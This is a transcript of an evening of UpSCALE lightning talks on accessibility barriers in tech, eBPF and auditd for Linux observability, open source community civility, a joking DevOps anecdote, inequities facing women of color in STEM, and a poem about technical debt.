people from participating. Money — it's another unintentional gatekeeper. Yay for SCALE being $90. Oh my God. That's some serious — you know, and even then, I know that Ilan lets people in for free. Also age. You know, we've got the graybeards in here, but we've also got the youngsters. If you don't have training materials that are in video, they're not going to participate. You have to go where they are, and you have to bring those different formats in. And then lastly — well, not lastly, I've got some more — tribal knowledge. I think this is the biggest one. You know, here I've got the jargon thing going on. Also the acronyms thing. Also all of these other assumptions we make about people's knowledge that keep people out. Also, security theater. We really don't need all of those password rules. There are other ways of doing security; there are other ways of doing things of that nature.
This isn't the way to go about it, and you do keep people out — especially, say, the elderly. Also, we have a lot of inertia. Why was QWERTY invented? To slow things down, because those keys jammed. We do so much of that in technology, where it's "the way it's always been done," and we keep people out. This hurts, for example, disabled people. Learning styles: lots of people learn in lots of different ways, and if you don't address those, you lock people out. There's a ton of people in trade school who could be coding right now, if you actually took the time to bring things to them on their level. Also, privacy — and encouraging spy-versus-spy behavior in your environments. We don't need that kind of behavior. We don't need the 4chan world, and we don't need a world where people don't have privacy. And you need to go out and get people, okay? You can't just sit back and wait for them. If you fish in a goldfish bowl, you will only catch goldfish. You've got to get out there. So I'm going to disagree with Seamus on that one: not just your friends. You've got to get out there, or you've got to get some of your other friends involved. And I know I'm forgetting some things — I came up with one just a little bit ago: idioms. There are all these other ways that we unintentionally do it, and so you have to watch for it. So the next thing you have to look at is to sit there and ask: how much of this, in a weird way, is intentional? How much of this is accidentally driven by ego or selfishness or insular natures? Get out there, work with other people, go and talk to the designers. To prevent a lot of this, remember you need to have the spirit of mentorship. You need to go to other people, do outreach, and bring them up to the top of the mountain. You don't get to sit there being the guru, all right? That's not what we're doing here. And then lastly, fixing it. You have to listen, and you have to give people lots of different ways to give you feedback so that you can help them. And if you don't do that, then you're never gonna get to where you can actually fix it — and fix it in a way that they can work with you. Thanks, I'm Solona Bonewald. Find me on Twitter.

Big thank you to Solona for opening up UpSCALE. UpSCALE is a surprisingly hard gig to talk at, because it's five minutes — which seems like it should be really easy, but you have to cram in as much content as possible, and your slides auto-advance every 15 seconds whether you want them to or not. So if you're seeing some interesting timing, that's part of the fun, and we wanna keep cheering our speakers on even if their slides are a little bit off. It's what keeps us a little bit entertained here tonight. All right, so with that, I'd like to introduce the next speakers. I think this is actually the first duo we've had, at least in the five years I've been hosting UpSCALE. So let's welcome our first speaker duo, Dr. John and Seth, and give them a big round of applause.

Thank you very much. Our presentation is: what the fuck is eBPF, and why should you care? Let's get into it. Glad I explained this. Just in case you're curious who is who: that's Dr. John, I'm Seth. We both come from a company called Spyderbat. My background's all in cybersecurity; John's is all in cloud and containers, and he's gonna tell us a little bit about logging, which is our most fun topic. Yeah, so we've got a few types of logging. We've got kind of traditional logging, which is discretionary.
We don't have to do it, and ultimately bad people are gonna try to avoid it, because they don't wanna log their exploits. Then we've got some mandatory logging, things like auditd, which has been in Linux for a while. auditd tracks basic stuff by default — system booting, people logging in and out, that kind of stuff, SELinux escalations — and with additional configuration we can log other things, if you configure it the right way. Here's what you get. It's fun looking through this stuff. So, a typical auditd message tells you, at some level, who did what and when. Here's another example. And now we're trying to answer: okay, so somebody ran a sudo command. When did they do it? Who was it? What did they do before this? What did they do after this? How do I stitch all this stuff together, right? Does auditd understand containers? No — unfortunately, auditd is not container-aware. It's been in the Linux subsystem for some time, and it won't tell you what's running in a container versus outside of one; it was designed before containers were really on the scene. And you're sad. This actually looks a lot like a cat I used to have called Mr. Pinky. It looks like he's got a little bit of a boo-boo on his foot there, so he's sad. So Seth, tell us about eBPF. All right, so now enters the hero of our story, eBPF. We have to go all the way back to the 90s, when a couple of brilliant people from Lawrence Berkeley Laboratory created a pseudo-device in order to be able to capture packet data — the specific packet data they wanted to filter on. And they essentially created a virtual machine in kernel space. So we have, in the kernel, a privileged capability with which we can now implement observability, security, and networking. In the 3.18 Linux kernel, that got extended, which is what allowed eBPF to hook any trace point in the system. What that allows us to do is create a bytecode program that passes from user space into kernel space through a verifier, where we can now compile eBPF and essentially filter on any system trace that we want. Now here's an example, because what most people will do is go through a frontend like Python: you get your library, and now you're writing eBPF — you'll notice it's very much a C-like program — where I can say, in this case, I want execve on the way in and out, so I'm getting execve information. Now, if you're not familiar, Brendan Gregg has a ton of BCC tools, freely available, that you can use and learn from: how do I get execsnoop, how do I get opensnoop? You can go through his examples, and we have links at the end of this presentation. There's also bpftrace, so if you don't want a Python frontend, you can use an awk-like interface to write BPF (there's a one-liner sketch below), and pipe the information you want to pull out of eBPF into your own programs — which is great, because you can pull it into your own data model, very differently from auditd. So now — go ahead, John, tell us more about what we can use eBPF for, now that we know how to get it. So, eBPF sounds cool — what can I use it for? Three use cases we'll talk about: networking, observability, and security. First up, networking. There's another subset of eBPF called XDP, the eXpress Data Path. Basically, we can intercept packets as they come into our interfaces and manipulate them, and particularly in the container space, folks are using this for things like traffic control, network policy, firewalling, and so forth.
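To make the contrast concrete — a minimal sketch, not from the talk — here is the same "log every exec" idea in both worlds. With auditd, you add a rule along the lines of: auditctl -a always,exit -F arch=b64 -S execve -k exec. With bpftrace, it's a one-liner that attaches to the execve syscall tracepoint and prints the calling command plus the program being executed, which is essentially the core of execsnoop (run as root):

```
bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf("%-16s %s\n", comm, str(args->filename)); }'
```

Every shell command, cron job, and container entrypoint on the box then shows up as a line of output, with no audit rules involved, and you're free to pipe it into whatever data model you like.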
Observability: we can get very granular visibility into what's happening in our systems, our Linux systems, our containers — what they're talking to, what processes are running, what network activity is happening. Hell knows it's real difficult to understand what's happening in Kubernetes; this helps us try to understand it. And then security: taking that observability, understanding at a granular level who's doing what and when — who's executing what, privilege escalations, who's moving laterally, exfiltration — we can get unparalleled visibility into what's happening. How can you learn more? ebpf.io is a great resource to just go to; it tells you all about the eBPF project. We've got a few other links here, including a great webinar, just to explain the basics of eBPF and how you can use it. Some things we're excited about: BPF LSM — think SELinux or AppArmor, but now I can actually block specific system calls — service mesh, eBPF actually coming to Windows, believe it or not, and OpenTelemetry. And finally, hey, there's this company called Spyderbat that can show you what eBPF's doing and really help you visualize it. Thank you.

All right, thank you so much to Seth and John. The next speaker up is Kim, and I hear she's gonna talk to us and teach us how to be nice. So let's give it up for Kim.

We'll see. Are you filming this year? Are we filming this year? Sure. Well, no, I was gonna say — 'cause I fucking hate slides too, so I did not prepare slides, but you're gonna see a lot of cute dogs, and we're going to ignore them while I talk about community. 'Cause we've had some stuff going on in this community lately that hasn't been nice. Somebody does a tweet, and everybody jumps on it, and people just freak out and they attack — and we just need to stop attacking. But what I do wanna say is: this is my view. It doesn't have to be yours, and it's definitely not my organization's view. This is mine, and I'm gonna share a little bit about what I've seen going on in the community lately and how we can all build a nicer community. So — they did not give me any notes, so we're gonna have to look here. Hold on a second. Enjoy the Paris cat. It is a Paris cat. So, why are we here? We love open source — that's why we're here. It's transparent. Yes, thank you, it is transparent. We like to collaborate, wag our tails together. We like to be inclusive. We cooperate. We learn from each other. It's openness and engagement, it's openness and sharing, and not leaving the puppy out, is it? But as I just mentioned, some of this stuff — hi, David — is just not happening lately, and I think it's time that instead of blaming, we seek to learn, and instead of shaming, we seek to understand, and we try to do this without the screen of social media. So you'll see a blank screen here in just a minute, and that's my shaming of social media. This is our seeking to understand — and if you know me, you know both of those. So why are we all here? First off, it's the technology. We come for the technology; we love it. I'm from the cloud native side. We all have our favorite technologies, but beyond that, when we build community, it's about bringing together our innovation and ideas, everybody coming together and sharing those ideas. We love to talk to each other and share what we're doing and how we're doing it. The most fun I have is when I go to a conference and — oh, this goes with — what is this one? Oh, poor Cole.
He did not like the jumping cholla. I don't remember what this one goes with, but that was my puppy — he was six months old, and that was a jumping cholla. But we come to these conferences and we talk together about how to build community, about best practices. I will go to a KubeCon and I will be speaking with our competitors — and we are competitors — and we're talking about the best way to build community, because at the end of the day, that's how we raise the tide for all of us. The technology is why we're here, but when we get beyond that, it's time for all of us to look at our transparency, look at how we can work together. Let's stop shaming, let's stop hiding behind social media and slamming people when they do a tweet, and let's come to these conferences and get to know people and have a good time. And that's all I've got — you get to enjoy the puppies. Thank you.

All right, can we give it up for Kim, and more importantly, Kim's puppy? Look how cute. We need a few more dogs. Awesome. All right, so — some cute puppies. All right, so while we get a demo of some more puppies, I would like to introduce our next speaker, Jeremy, who's gonna be talking to us about DevOps.

Yeah, so the alternate title for this is "DevOps, When I Was an Asshole" — because obviously I'm not one now. Some of you can attest to that. Yeah, so we're gonna go in a time warp to when I was probably two years old at this point — but about 30 years ago, 1995, I guess, if we do the math correctly — I was working at an internet provider and started out doing support. I was actually building all of those nice little CDs you used as coasters, the ones that included things like WS_FTP and Winsock. Who remembers the good old Winsock days? That's right. So that company started to expand really, really quickly and grew by three floors. The CTO — the VP of technology — decided that we should run the cabling and then have the contractors connect everything at the wall; they could handle that, and we could just do the cabling. Which really was not the greatest of ideas, and he had a plethora of really bad ones over the years I was there. It didn't really make a whole lot of sense. And then he came and said, you know, we don't know where any of those cables go, so you should grab a tone generator, go to all of those, figure out where they are, and mark them on the patch panel. And really, this was my thought: really? And he really kind of said, you know, we should really do this — which really meant I was gonna have to do this. So I started figuring it out: okay, we've now expanded by about 80 new people across three different floors, and I'm gonna have to take a tone generator to all of these. I didn't major in math, but I figured that was probably gonna take me eight to ten hours, or a couple of days, and the 20-year-old in me was not amused at all. So I kind of stepped back and I thought, you know, this really sucks. And I'm sitting back — I was in the data center — and I kind of look behind me, and I see all these patch panels. And I thought, you know, what if I unplug one? And this is very similar to the conversation — complete with GeoCities, Eudora mail, Winsock, you know, all of that, the POP server; we all remember POP3. And so I said, you know, let me see: what does it say there? What is the number? I kind of realized this was my opportunity to do this really quickly. Plugged it back in, everything works.
And it worked just well enough that, over the next hour, the whole building experienced intermittent network outages, as everybody went down for a short period of time — until they called me. So I realized at this moment: this was DevOps. This is what we do. We get everybody involved, whether they want to be or not. So I started to understand all these different principles of DevOps. I encouraged teamwork: everybody in that fucking building got involved, and together we solved those intermittent network outages. All of us together — teamwork. I also reduced the silos within the technology org, because all of a sudden everybody was together. It was not marketing over here, not sales over there, and whatever the other teams do — it was all together. Also, I live in Kansas; we didn't create any silos during that time, so I think it was a win. Also, systems thinking: again, it was everybody together, and we included whatever systems were available to solve those network outages. Systems thinking. This was also a picture of me in those days. I also learned from failure. I understood from the failure of the asshole VP that we should have just done it ourselves, hooked everything together, and made notes so that we wouldn't have to redo things over and over. We did that. We also communicated. For those of you who don't remember the 90s, or weren't born then: we also used phones for more than just TikTok dances. We actually talked on them, which is a really weird thing. We'll talk about that later. I also accepted the feedback from every single person who called. They said: this doesn't work. And then I fixed it. And their feedback, overwhelmingly, was: you're awesome. So it was good. It was a good day. We also iterated rapidly. I started with one or two cables, then quickly moved up to five, ten, twelve at a time, and really just kept things going. It's kind of like when you're building a deck — which you don't want me to do. Then we automated. And really, that automation came down to: I just pulled whatever I could, and continuously did that, over and over and over. Again, everybody was involved. It's really what you do with DevOps. Now, all of this is in jest, because that is fucking not how you do DevOps. But I hope you go out and check out Emily Freeman's book. It's a great way to get started and understand what DevOps is. And with that, I say thank you.

Jeremy can make my slide decks any day, I don't know about you. Thank you so much, Jeremy. We've got two more speakers on deck for you. Next up, please welcome Arti. She's gonna be talking about where inequities begin, so please give her a round of applause and welcome her.

Hey. Thank you. Thank you, thank you, thank you. Oh, hey, what do you know — another room where nobody else looks like me. Except you. Yay. So I'm here to talk about Mind the Gap: where inequities begin. So who the hell am I? I am an educator. I used to be a kindergarten teacher. I've taught special education, all of that stuff. And I've done DEI work. But as we begin this session, I'd like to start with three agreements. Please stay engaged — as a kindergarten teacher, I do not brook any nonsense. And know that you might — let's make that you will — experience discomfort. So let's start with an experiment. Close your eyes if you'd like. I'm gonna tell you a story. You're on a plane, and the pilot welcomes you aboard. Then you attend a keynote talk by a Silicon Valley CEO. And then you go to a restaurant where a couple is celebrating over dinner. Who was the pilot?
Open your eyes. Was the pilot a woman? Was the CEO Black, a woman, Latinx, Asian? Who were the couple? Were they two men, two women? Were they trans? I'm gonna bet they weren't. So: race plus gender plus class. They make interlocking power relations — the systems that oppress girls of color who are traversing what's called the pipeline. And these affect women's ability and likelihood to enter careers such as STEM. So tech has had a focus on populating the pipeline with girls of color without actually taking the time to investigate: where's the leak? Where are the girls of color? Where are the women? This is what has resulted in tech not being able to hire or retain. So what is the cause of the leaky pipeline? It begins in childhood, usually in elementary school, and it gets far worse in middle school. In middle school, 74% of girls want to go into STEM. But by the time they go to college, it's 0.4%. So why is that? Because there's learned implicit bias in young children. As a kindergarten teacher, I can tell you it exists. In the 1940s, psychologists figured out that young Black children — as young as three, four, and five — already had a clear preference for white dolls over Black dolls. So what the fuck happened to the girls? The teachers had gender bias. They consistently underestimated the girls. The girls were placed in ability groups. They got a watered-down curriculum. They didn't have equal access to a high, advanced curriculum. Why? And let's say they get to college — but they are discouraged from STEM. Why would you go into STEM? It's so masculine. So what are the barriers for women, and especially women of color? Implicit bias, name bias, race bias, sex bias, beauty bias — name it, they have it. So let's say they go to college, and they can afford it. They drop out of STEM majors. Sheryl Sandberg said there aren't more women in STEM because there aren't more women in STEM. Women apply to roles only when they meet 100% of the qualifications. Men? 60%. Women are 30% less likely to be called for an interview than men who have the same effing qualifications. Women face subtle but very pervasive doubts — nothing that has to do with their actual performance. They experience sexual harassment, isolation. They are excluded from leadership opportunities. And I'm gonna leave this here, because this is a room full of STEM people; I think you can read a graph just fine. That graph has an effing mood. And also, no one told me I could cuss. Fine. Let's say you've successfully eliminated all barriers: you've hired women, you've hired women of color. Yay, woohoo, you're done, right? No — now you've gotta retain them. How the fuck are you gonna retain them? Let's find out. Why do women leave tech? The culture benefits males. They perpetuate an exclusionary culture. It makes it really uncomfortable for women, and especially minority women. There's a wage gap — it's about 52 to 84 cents for every dollar a man earns. They have a 45% chance of being sexually harassed, second only to the military. Women are more than twice as likely to leave STEM jobs, because they're expected to raise a family, raise children. And guess what? The fucking pandemic made it worse. In STEM, do women experience institutional culture barriers or stigmas more than men? Mm — that's about 98%. And what challenges do they face? I'll leave that up there; I don't have to read it to you. These are the supports that women need to remain and thrive in STEM. It's one thing to hire them.
It's a whole other cup of tea to actually retain them. These are the things women need. They need mental health help and all of those things. Ultimately, race and gender continue to matter in very complicated, nuanced ways even today. So we got women's suffrage in 1920, but we run the risk of fucking up those gains if we don't diversify our workplaces. This is me. Contact me if you have any questions. Thank you very much.

Thank you, Arti. I guess next time I will tell everyone they're allowed to curse, but I love the forks. Thank you so much. Everyone's gonna work on mentorship programs and pipelines after that one, yeah? Yes? You did not warn me how emotional I was gonna get after Arti's talk. You know, we've gotten the whole gamut of emotions tonight. So how about some poetry? Anybody else for some poetry? All right, to close out our talks and your whole rollercoaster of emotions for the evening, that's what we always promise for Upscale: highs, lows, lefts, rights, all those things. Let's welcome Fatima, who's gonna give us a little bit of poetry.

Yeah, sounds good. Awesome. Hi everyone, my name is Fatima. I'm a developer evangelist at GitLab. You can find me on the internet as Sugar Overflow. And this is a very special ode to technical debt that might get a little emotional, thanks to Arti. Do, do, do, do, do. Our story begins once upon a time in a land far, far away where lightning bolts strike. A legend now etched into this rhyme, about a tool by which open sorcerers conquered the night: automated build tools, that old DevOps pipeline. And so arrived our adventurer at hand to maintain and build upon the tooling mentioned, and found there was a mountain of technical debt: no documentation, no roadmap, no updated issues, only dread. Composer 2.0 was on its way, which meant that build tools too needed an update. So she gathered the council of open sorcerers in the land, but no one had the pieces of this mysterious roadmap. And so to the king she went, asking for support, for resources, for contractors, or for budget from the court. Be gone, said the king, and go do your magic. You don't need a whole team; just you will manage. Our adventurer crawled through the depths of the code, configured, refactored, tested, and steered; with some help from her peers, she persevered. Features, dependency updates, and new releases. She built bridges to connect all of the dots and the pieces. I definitely talk too fast for an Ignite talk. And then came a wave of users, 4,000 and more. Issues were opened and reopened, bugs were reported, and there were edge cases in store. And the high council of sorcerers met each week and noted that it was too much for just one person to upkeep. I'm sure we've all been there, expected to do five jobs. Our adventurer, she tried to communicate the tech debt, to request resources and express the growing impact. But when the storm of issues and merge requests came, it was only her mentors and friends who kept her sane. To friends she spoke of incompetence and dying hopes, of stress over this tool that the company didn't even officially support. They reminded her that it didn't reflect on her competence or self-worth, and that having carried that mountain alone was a measure of how much she'd grown. Enough is enough, she realized one day, and couldn't come up with enough reasons to stay. Then in a meadow she met a delightful tanuki. Come with me, it said, to a land far, far away, where we'll value your expertise and you'll want to stay.
And so from the crossroads of tech debt and burnout, our adventurer moved on. And on to you I pass her legend and legacy: that moving on was better than carrying a mountain of tech debt alone. Thank you.

Who is ready to buy the children's book? Yeah, I think part two is in order, a kids' book for growing technologists with diverse profiles. You know, we could work on it. It'll be an Upscale exclusive. All right, is Louise still here by any chance? No worries. Okay, that concludes our content for Upscale tonight. Yes, seriously, speaking at Upscale is super difficult. It seems really easy, but it's very hard when your slides advance without you, whether you like it or not. So big congratulations to all seven of our speakers. Please thank them again; they did a great job. If you want to brave speaking at Upscale next year, you can always let me know and I will put you on the nomination list. We might have a few more drink tickets lingering around. If so, try to locate one and grab a drink on your way out, and thank you so much for attending.